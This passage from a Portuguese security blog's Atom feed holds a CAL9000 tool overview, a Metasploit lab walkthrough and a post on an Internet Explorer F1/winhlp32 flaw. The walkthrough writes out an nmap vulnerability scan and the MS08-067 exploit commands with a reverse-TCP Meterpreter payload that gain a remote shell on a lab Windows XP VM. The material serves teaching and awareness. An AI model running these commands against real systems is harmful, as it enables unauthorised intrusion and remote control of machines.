/&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYd3LpQraI/AAAAAAAAAM0/m4n9WOEE5gI/s1600/ScreenShot016.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 155px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYd3LpQraI/AAAAAAAAAM0/m4n9WOEE5gI/s320/ScreenShot016.jpg" alt="" id="BLOGGER_PHOTO_ID_5518631227244981666" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 17 - Clique na guia Checklist.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Há duas seções principais para a ferramenta Checklist. A metade superior da tela dá-lhe uma lista de coisas importantes para testar, com sugestões e maneiras de teste para cada item e um exemplo ou medidas concretas para realizar o teste. A metade inferior da tela dá-lhe uma área de bloco de notas onde você pode fazer anotações sobre os resultados de seus testes, como mostrado na figura 18.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYeHWIr5mI/AAAAAAAAAM8/7eA0Vb0-rBs/s1600/ScreenShot017.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 169px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYeHWIr5mI/AAAAAAAAAM8/7eA0Vb0-rBs/s320/ScreenShot017.jpg" alt="" id="BLOGGER_PHOTO_ID_5518631504939050594" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 18 - A ferramenta de teste Checklist.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Esta é uma das áreas mais útil na ferramenta CAL9000 porque ajuda a garantir que você não esqueça de todas as áreas de vulnerabilidade em potencial encontradas.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AUTOATTACK&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYehya_4ZI/AAAAAAAAANE/J82nYXt0LSw/s1600/ScreenShot018.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 155px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYehya_4ZI/AAAAAAAAANE/J82nYXt0LSw/s320/ScreenShot018.jpg" alt="" id="BLOGGER_PHOTO_ID_5518631959208649106" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 19 - Clique na guia AutoAttack.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;A ferramenta AutoAttack é usada em conjunto com a ferramenta HTTP Requests, para formular ataques personalizados contra seu aplicativo. Este é um recurso avançado que, embora útil, não é crítico para a realização de testes básicos de segurança.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYeyHeAiXI/AAAAAAAAANM/zhQDF-I4CTw/s1600/ScreenShot019.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 153px;" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TJYeyHeAiXI/AAAAAAAAANM/zhQDF-I4CTw/s320/ScreenShot019.jpg" alt="" id="BLOGGER_PHOTO_ID_5518632239736326514" border="0" /&gt;&lt;/a&gt;&lt;span style="font-style: italic;"&gt;Figura 20 - Utilizando SQL Injection.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYfDUUg69I/AAAAAAAAANU/JRo7I9sPSTA/s1600/ScreenShot001.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 188px; height: 151px;" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TJYfDUUg69I/AAAAAAAAANU/JRo7I9sPSTA/s320/ScreenShot001.jpg" alt="" id="BLOGGER_PHOTO_ID_5518632535243942866" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Para maiores informações:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;OWASP CAL9000 Project&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project"&gt;http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Securing PHP Web Applications&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.informit.com/store/product.aspx?isbn=0321534344"&gt;http://www.informit.com/store/product.aspx?isbn=0321534344&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Web Application Security com CAL9000&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/dica/Web-Application-Security-com-CAL9000"&gt;http://www.vivaolinux.com.br/dica/Web-Application-Security-com-CAL9000&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Obs.:&lt;/span&gt; Se não sabe o significado e a filosofia Hacker, leia o artigo "&lt;span style="font-weight: bold;"&gt;Uma  breve descrição do termo "Hacker"&lt;/span&gt;", escrita por Julio Cesar Campos,  usuário do VivaoLinux.&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/artigo/Uma-breve-descricao-do-termo-Hacker"&gt;http://www.vivaolinux.com.br/artigo/Uma-breve-descricao-do-termo-Hacker&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYiXsO8llI/AAAAAAAAANc/Ob6HshF0KHI/s1600/LOGO+CODESEC+-+PRETO+-+VERDE+e+BRANCO2.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 145px;" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TJYiXsO8llI/AAAAAAAAANc/Ob6HshF0KHI/s320/LOGO+CODESEC+-+PRETO+-+VERDE+e+BRANCO2.png" alt="" id="BLOGGER_PHOTO_ID_5518636183795308114" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Roberto S. Soares (&lt;span style="font-weight: bold;"&gt;espreto&lt;/span&gt;)&lt;br /&gt;robertoespreto@gmail.com&lt;br /&gt;espreto@backtrack.com.br&lt;br /&gt;Skype: robertoespreto&lt;br /&gt;http://codesec.blogspot.com&lt;br /&gt;&lt;br /&gt;"Eles se baseiam na matéria, e aqui ela não existe!"&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-3551737765112151494?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/3551737765112151494/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/09/cal9000-web-application-security.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/3551737765112151494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/3551737765112151494'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/09/cal9000-web-application-security.html' title='CAL9000 - Web Application Security Testing Assistant - Introdução'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_fzuc26ZLs28/TJYXKRgMBkI/AAAAAAAAAKk/p8wIN1VKGTk/s72-c/ScreenShot001.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-1316284764566934225</id><published>2010-03-25T15:58:00.012-03:00</published><updated>2010-03-25T16:26:16.633-03:00</updated><title type='text'>Intrusão Simples com Metasploit</title><content type='html'>Salve! Salve! Aqui vai mais um textinho falando sobre o framework Metasploit. Irei demonstrar algumas técnicas simples/básicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma máquina MS para obtermos uma shell. Let`s go???&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;Começando!&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Bom galera, vamos começar!&lt;br /&gt;&lt;br /&gt;Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (Virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico.&lt;br /&gt;&lt;br /&gt;O cenário utilizado foi o seguinte:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S6uz0E7-HOI/AAAAAAAAAI0/wnuQBcMmjow/s1600/cenario1.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452649481121963234" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 130px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S6uz0E7-HOI/AAAAAAAAAI0/wnuQBcMmjow/s320/cenario1.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs, estão configuradas como bridge.&lt;br /&gt;&lt;br /&gt;1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.&lt;br /&gt;2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.&lt;br /&gt;&lt;br /&gt;Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre o mesmo.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;Scanning com Nmap e Metasploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.&lt;br /&gt;Abra um terminal no micro com o backtrack e digite a seguinte sintaxe:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;# nmap -v -sS --script=smb-check-vulns 192.168.0.0/24&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-v&lt;/strong&gt; = Modo Verbose&lt;br /&gt;&lt;strong&gt;-sS&lt;/strong&gt; = TCP Syn Scan&lt;br /&gt;&lt;strong&gt;--script=smb-check-vulns&lt;/strong&gt; = Script para verificar vulns conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.&lt;br /&gt;&lt;strong&gt;192.168.0.0/24&lt;/strong&gt; = Range de IP utilizado em minha rede local.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u0BNb6z3I/AAAAAAAAAI8/Plq6jLisbfA/s1600/smb-check-vulns.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452649706741747570" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 294px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u0BNb6z3I/AAAAAAAAAI8/Plq6jLisbfA/s320/smb-check-vulns.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Se repararem, no host com endereço IP 192.168.0.186, verá que é mostrado as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.&lt;br /&gt;Certo, descobrimos um host dentro da nossa LAN que está possívelmente vulnerável ao nosso ataque pretendido!&lt;br /&gt;Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S6u0KlmZAkI/AAAAAAAAAJE/FnLCVxQ05Jw/s1600/bannermetasploit.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452649867846943298" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 231px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S6u0KlmZAkI/AAAAAAAAAJE/FnLCVxQ05Jw/s320/bannermetasploit.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Obtemos nosso console do msf. Dei uma personalizada na saída :-)&lt;br /&gt;&lt;br /&gt;Feito isto, vamos efetuar a intrusão na máquina.&lt;br /&gt;Os comando são os seguintes:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;use exploit/windows/smb/ms08_067_netapi&lt;/strong&gt; &lt;------ Aqui falamos que queremos usar o exploit ms08_067_netapi &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set RHOST 192.168.0.186&lt;/strong&gt; &lt;------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2 &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;/strong&gt; &lt;------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set LHOST 192.168.0.170&lt;/strong&gt; &lt;------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;exploit&lt;/strong&gt; &lt;------ E finalmente executamos nosso exploit. Observem a imagem abaixo. &lt;/p&gt;&lt;p&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S6u0VSmfNPI/AAAAAAAAAJM/IaPLxidLlYY/s1600/meterpreter.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452650051725636850" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 268px; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S6u0VSmfNPI/AAAAAAAAAJM/IaPLxidLlYY/s320/meterpreter.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S6u0i5yO18I/AAAAAAAAAJU/qLtRzIOzPP8/s1600/infosystem.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452650285582178242" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 258px; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S6u0i5yO18I/AAAAAAAAAJU/qLtRzIOzPP8/s320/infosystem.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;Opções Metasploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do Sistema Operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.&lt;br /&gt;Como vimos atráves do script do nmap que nosso alvo é vulnerável, podemos "nós" realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.&lt;br /&gt;&lt;br /&gt;Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um módulo auxiliar presente no metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.&lt;br /&gt;&lt;br /&gt;Executaremos os seguintes comandos:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;use auxiliary/scanner/smb/smb_version&lt;/strong&gt; &lt;---- Falamos que queremos utilizar o scanner smb_version. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set RHOSTS 192.168.0.186&lt;/strong&gt; &lt;---- Aqui eu setei um único host (192.168.0.186), mais poderia especificar um range, exemplo, 192.168.0.0/24. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;run&lt;/strong&gt; &lt;---- Comando para executar nosso scanner. &lt;/p&gt;&lt;p&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u0urBk9hI/AAAAAAAAAJc/SlGOoM_mjDw/s1600/scannersmb.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452650487778440722" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 186px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u0urBk9hI/AAAAAAAAAJc/SlGOoM_mjDw/s320/scannersmb.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;use exploit/windows/smb/ms08_067_netapi&lt;/strong&gt; &lt;------ Aqui falamos que queremos usar o exploit ms08_067_netapi &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set RHOST 192.168.0.186&lt;/strong&gt; &lt;------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2 &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;/strong&gt; &lt;------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set LHOST 192.168.0.170&lt;/strong&gt; &lt;------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;set TARGET 31&lt;/strong&gt; &lt;------ Aqui eu digo o que o alvo está usando. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;exploit&lt;/strong&gt; &lt;------ E finalmente executamos nosso exploit. Na imagem abaixo, é listado com o comando show targets, todos os S.O.s vulneráveis a este exploit (ms08_067). &lt;/p&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S6u05hvXNZI/AAAAAAAAAJk/pUjADyWpA3k/s1600/showtargets.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452650674264683922" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 240px; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S6u05hvXNZI/AAAAAAAAAJk/pUjADyWpA3k/s320/showtargets.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Veja abaixo que irei utilizar a opção 31.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u1HXW1W3I/AAAAAAAAAJs/rcwbPhUcCxU/s1600/opcao31.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452650911995616114" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 310px; CURSOR: hand; HEIGHT: 320px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S6u1HXW1W3I/AAAAAAAAAJs/rcwbPhUcCxU/s320/opcao31.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Veja o ataque agora.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S6u1RheNvTI/AAAAAAAAAJ0/gLPzmhoaQTQ/s1600/meterpreter02.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452651086509620530" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 147px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S6u1RheNvTI/AAAAAAAAAJ0/gLPzmhoaQTQ/s320/meterpreter02.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Veja que não foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele encontrará em seu destino.&lt;br /&gt;&lt;br /&gt;Ok! Finish! The end! Heheheh&lt;br /&gt;&lt;br /&gt;Ah!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S6u1cPuQX7I/AAAAAAAAAJ8/_Ur_GF6wGoo/s1600/shell.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5452651270723624882" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: hand; HEIGHT: 207px; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S6u1cPuQX7I/AAAAAAAAAJ8/_Ur_GF6wGoo/s320/shell.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.&lt;br /&gt;Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#cc0000;"&gt;Metasploit Exploitation&lt;/span&gt;&lt;br /&gt;&lt;a href="http://codesec.blogspot.com/2010/02/metasploit-exploitation.html"&gt;http://codesec.blogspot.com/2010/02/metasploit-exploitation.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Abraços a todos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Roberto Soares (&lt;strong&gt;3spreto&lt;/strong&gt;)&lt;br /&gt;codesec.blogspot.com&lt;br /&gt;WWW.backtrack.com.br&lt;br /&gt;robertoespreto@gmail.com&lt;br /&gt;espreto@backtrack.com.br&lt;br /&gt;® &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-1316284764566934225?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/1316284764566934225/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/03/intrusao-simples-com-metasploit.html#comment-form' title='5 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1316284764566934225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1316284764566934225'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/03/intrusao-simples-com-metasploit.html' title='Intrusão Simples com Metasploit'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fzuc26ZLs28/S6uz0E7-HOI/AAAAAAAAAI0/wnuQBcMmjow/s72-c/cenario1.PNG' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-376206699764923232</id><published>2010-03-02T16:25:00.021-03:00</published><updated>2010-03-25T17:31:42.134-03:00</updated><title type='text'>F1 = Fórmula 1? NÃO! Mais uma vuln. do IE.</title><content type='html'>Na sexta-feira (26/02/2010) foi levantada uma questão de segurança, alertando os usuários do Windows XP, para que não pressionem a tecla F1, se solicitado durante a navegação pela internet usando o navegador internet explorer. Caso contrário, poderá ser facilitada a invasão do computador, permitindo um controle total do mesmo pelo atacante.&lt;br /&gt;&lt;br /&gt;Segue link da notícia.&lt;br /&gt;&lt;br /&gt;&lt;a style="FONT-WEIGHT: bold; COLOR: rgb(51,102,255)" href="http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx"&gt;Investigating a new win32hlp and Internet Explorer issue&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;O exploit já se encontra disponível no trunk do metasploit, basta atualizá-lo com o comando svn update.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_fzuc26ZLs28/S41zzSjTSLI/AAAAAAAAAIU/m2bh0UBJ8dQ/s1600-h/winhlp32start.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5444134849551222962" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: pointer; HEIGHT: 292px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S41zzSjTSLI/AAAAAAAAAIU/m2bh0UBJ8dQ/s320/winhlp32start.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Na imagem acima, estou usando o exploit &lt;span style="FONT-WEIGHT: bold"&gt;ie_winhlp32&lt;/span&gt; com o metasploit e esperando que o usuário clique em nosso link, no caso, &lt;span style="FONT-WEIGHT: bold"&gt;http://192.168.0.192/&lt;/span&gt;. Aqui é demonstrado um jeito "simples" de usar o exploit, para fins de testes e também para demonstrar ao usuário final as possíveis mensagens que deverá aparecer a eles, caso venham a acessar algum site malicioso. Segue imagens abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/S45sKhwGrII/AAAAAAAAAIc/P_z1OvbsF9c/s1600-h/pressionef1.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5444407927652134018" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: pointer; HEIGHT: 239px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S45sKhwGrII/AAAAAAAAAIc/P_z1OvbsF9c/s320/pressionef1.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Abaixo, alterei a mensagem para o português!&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_fzuc26ZLs28/S45sYygZb_I/AAAAAAAAAIk/xzW-GKGqN7U/s1600-h/varia%C3%A7%C3%A3o1.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5444408172667826162" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 320px; CURSOR: pointer; HEIGHT: 240px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S45sYygZb_I/AAAAAAAAAIk/xzW-GKGqN7U/s320/varia%C3%A7%C3%A3o1.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Fica o aviso ae pessoal!&lt;br /&gt;Testado com o IE7 no windows XP com SP3! Com o IE8 no XP SP3 totalmente atualizado também funcionou, conforme testes de alguns profissionais!&lt;br /&gt;&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;Recomendação:&lt;/span&gt; Utilizem o Firefox, até que seja disponilizado pela microsoft um patch para a correção da vulnerabilidade!&lt;br /&gt;&lt;br /&gt;&lt;span style="FONT-WEIGHT: bold"&gt;Obs.&lt;/span&gt;: Para os profissionais de S.I. que, com certeza saberam usar o exploit, alterem as devidas opções para o funcionamento correto do exploit! :)&lt;br /&gt;&lt;br /&gt;Abraços à todos!&lt;br /&gt;&lt;br /&gt;3spreto&lt;br /&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-376206699764923232?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/376206699764923232/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2010/03/f1-formula-1-nao-mais-uma-vuln-do-ie.html#comment-form' title='8 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/376206699764923232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/376206699764923232'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2010/03/f1-formula-1-nao-mais-uma-vuln-do-ie.html' title='F1 = Fórmula 1? NÃO! Mais uma vuln. do IE.'/><author><name>Roberto dos Santos Soares 